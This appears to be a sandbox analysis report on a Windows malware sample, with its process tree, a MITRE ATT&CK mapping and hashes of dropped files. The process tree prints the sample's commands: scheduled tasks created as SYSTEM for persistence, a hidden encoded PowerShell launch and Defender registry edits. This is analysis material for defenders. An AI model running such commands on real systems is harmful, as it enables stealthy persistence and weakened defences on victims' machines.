C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggLAFgWrk"2⤵PID:368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 07:19:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe\" Ty /JCsite_idmEP 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:3876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mRaseIvrfxDtBOYKW"2⤵PID:6072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5024
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5496
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2472
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:5356
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\FdDlcag.exe Ty /JCsite_idmEP 385118 /S1⤵PID:5292
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"2⤵PID:3744
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1108
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4816
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:5976
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\oBlsMT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- Creates scheduled task(s)
PID:5664
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
6Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD58b8cba39d9205d72aa6c2fee010148ab
SHA1875824af7b71abc5128cec8ccd8fc8653d0116df
SHA25684c8c0ab0cdb270d82f09ec6642fc8374955398e5cb2beb62de5b353de5971f5
SHA512991d13a8af7154c38c4c4156181e5963c05fce52ec480bc23aa8b060b0669a23f220ac04880d463cd1ac86588a2ab3d28132a8ef8b23e56e70fa8a1e7c29341d
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5a6ea7bfcd3aac150c0caef765cb52281
SHA1037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23
-
Filesize
21KB
MD5d4fb70f520e1f56b44239872747c434d
SHA17daef2e9f01d6ee2f9525e3ab1062b45acc842d0
SHA256dce70b0ae042291a8770b82889c55ccd70a32db06a9d3c3a0306010f0770de03
SHA5120ab3219cb499cedcf8a761ce39b41e885bb321f289a6b2a8ad6504032078a56a6df20a87eb80e2593a200436681d7415bdd6c580aa96ee63735423537f65d836
-
Filesize
21KB
MD58f0d36dbc8bc08a8d7733bbdcbf3f5a4
SHA187b0b09615c82e4cccb5ed9aa2c44010f8697ca1
SHA256d5f96c5aa20643acb6817eae3cbae657097134ba066843ed05bdc0244921a7dc
SHA5121dbe952266c33b6182590699663db061ab7fc0aab2af8293eeac6f568cebb0f001fb7f9d107404154b1a28fc283924848d3ad3767d1a7a2f1fc151d20226c8e2
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
64B
MD587ff296944a07ddf7ebcb4fad948257b
SHA19824cf38e910934f9678a4ccb5609e86f6d9d704
SHA256f34fda3a16957ad62691c8d3c0d79f276715feae8a9d9c9aaf77d50317a8646b
SHA512c057356bfe7c6abdf312fbdb470c5b3c01b5aa089677f397038b6cdaa3ab978174f01f5ce90ec86f02d27ab5590cfa54c11d72a8433048bbaf2e4a98b0069b07
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\additional_file0.tmp
Filesize2.5MB
MD520d293b9bf23403179ca48086ba88867
SHA1dedf311108f607a387d486d812514a2defbd1b9e
SHA256fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA5125d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\assistant_installer.exe
Filesize1.9MB
MD5b3f05009b53af6435e86cfd939717e82
SHA1770877e7c5f03e8d684984fe430bdfcc2cf41b26
SHA2563ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7
SHA512d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\dbgcore.dll
Filesize166KB
MD58b6f64e5d3a608b434079e50a1277913
SHA103f431fabf1c99a48b449099455c1575893d9f32
SHA256926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\assistant\dbghelp.dll
Filesize1.7MB
MD5925ea07f594d3fce3f73ede370d92ef7
SHA1f67ea921368c288a9d3728158c3f80213d89d7c2
SHA2566d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259311\opera_package
Filesize109.0MB
MD5856c0e24f5ee9715ee77bd4fef0995ae
SHA102b109c418bfdee0fc725faa35f8c45ae0725929
SHA25674e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1
SHA512242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff
-
Filesize
6.4MB
MD5ccdc5c743b6031e977a71cf919c0db7e
SHA1f9e399475e158c6f2ea8ca2c991ffb37ba89ac30
SHA256f08ebffa05fd0fee031986a37356aa91c55735e61e573e2005e705125192c44e
SHA512f802cf236f75924271cafffd1be7319f2d1eaa26eecabc117a066f61a35c2acbbdcecf8bd93931ed61811b760a92695a4e2c291b5e81104bce1608d62ebee9f0
-
Filesize
6.7MB
MD5b119ea556def66eaa9f751a650b45af0
SHA1daf3fa0325b110183d0a233b4b0d1875f0b49ca8
SHA25653c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4
SHA51208dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4
-
Filesize
106KB
MD5fe380780b5c35bd6d54541791151c2be
SHA17fe3a583cf91474c733f85cebf3c857682e269e1
SHA256b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
SHA512ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c
-
Filesize
4.6MB
MD52c8ab707b79399f1cbaf2cd17003d614
SHA1034bd6bbd7123627ca202b6b35b9018261fc03d5
SHA256c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede
SHA512d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
259KB
MD577d761b9bf240b7dc67c06208272e05e
SHA1fb5682433d43c10333a5d368047ba61ab7f4d14f
SHA256492f3d1cde4e25da81e94ceeb7cb8469740db841bf7158ad3ebed11ef73277f0
SHA5127314da44c30e98d647050e1db32030fb9dbdb18c1a899cccaec0337b4ecda5a53fb4e63e61780a6cf4059066bd5e55c9e426efa525ff79eed8d5a01f8488f76c
-
Filesize
1.7MB
MD5eee5ddcffbed16222cac0a1b4e2e466e
SHA128b40c88b8ea50b0782e2bcbb4cc0f411035f3d5
SHA2562a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54
SHA5128f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc
-
Filesize
40B
MD542bedf710b88912bd657522d213a4faa
SHA199131938c0cb90fcc8648caf086dc0e6f0f2223e
SHA256ce4342df7c203496aca5a35d8ebd74ff95c6a3e1dfee371b6afb42489a96dde1
SHA5123cd742efa28cc7146a1de1eab0c145790b7f45cf8030abba7dc61c8e340507273ccf514d99cb5c9d5ed58f925ca71dc15699b74c8147cc6af594bea754dd7e0d
-
Filesize
128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize
7.5MB
MD5fd0048f4e2d30786133d001b54f4a72f
SHA1a7135f8891dc1e09d66bd4fc8e06eca519dcdf49
SHA256c79aae6d95db14bf3827cb783cd7bf4354f1971af2e55d94a83b752080f9aae0
SHA51258dfbcd6eeead17b91b27b65588737a1c61485a25a5a730cab60defc3a629b4dd8d45c635b2c21376a1145122bc95d500aab5628865d5af3d563254aa7cf5bef
-
Filesize
437KB
MD57960d8afbbac06f216cceeb1531093bb
SHA1008221bf66a0749447cffcb86f2d1ec80e23fc76
SHA256f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84
SHA51235d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize
4.2MB
MD5db2472ac77f8643d97782704e54c19dc
SHA10c618c3f12f5bbe4983431210f9148e58a5f965b
SHA2569100d2cfcd9248cfc577a35519d108146f0358e81ba15432544f76b7113951b1
SHA512dbffd3e0f20e2835735f65f665f491ac9da0ceeaff6441364d8514c75bd635ce4c99dc7d3fcf96ecbbbd7460d8bbee5e6e3bfb953ce43a8be496f1c9121c50c2
-
Filesize
5.1MB
MD5ac8e41a86e7f4cd0fa7d8b7012b87547
SHA1d702aebf8476ff002f351396a3c436af29f78033
SHA25650cf2a556894e3d7c421941fe180895c1a41fea6a3606957aa22a0b9ea8ca570
SHA512b03a6d332b18a82045ca906d9d6f51948b58b224657971d0d6980e8be1f688b28745737739f7443c34f8055fdd93d44cc4ddda34605d31c13086760a9810c9c1
-
Filesize
404KB
MD5c17df3b36319b6b84e52bdce820abf10
SHA1eea9d0ffcf2112b098bc2cca88d2011f466298ec
SHA25637681e9a5d6ab77924f9b43c5f717ff63cc5bece2116c05bd382089f22137157
SHA512b08936a50a618ef03c4367b442febe400193ddfd9e033009b00e8823aad1f68d38415624f4a22144ce9cd12d68dd52ffbfd9e1e5e8c2d2c13f1e3312c9dc68df
-
Filesize
4.2MB
MD5808a710a267e8394e802281380ca0b59
SHA1151555028550b912c0bef786fe1b99e3437dde72
SHA25631fa6769cb32f90dfa2809349040c227bd88f3a553bc50915656f60863b86f34
SHA512bfcdc6e2f429569b0ebf4bf8e1592ed28f85467a90554d7796c11f4e8aebc0ab409be9dd75189a25c2fa988534c1be6eb073dfec7637c6c4b58c11a7ad3b3a25
-
Filesize
3.2MB
MD54204b9d4c4df5c4b4d67922db24f342a
SHA19255b5e94028f3f55adda2576d60bd39452eaf08
SHA25662cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414
SHA5120b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423
-
Filesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732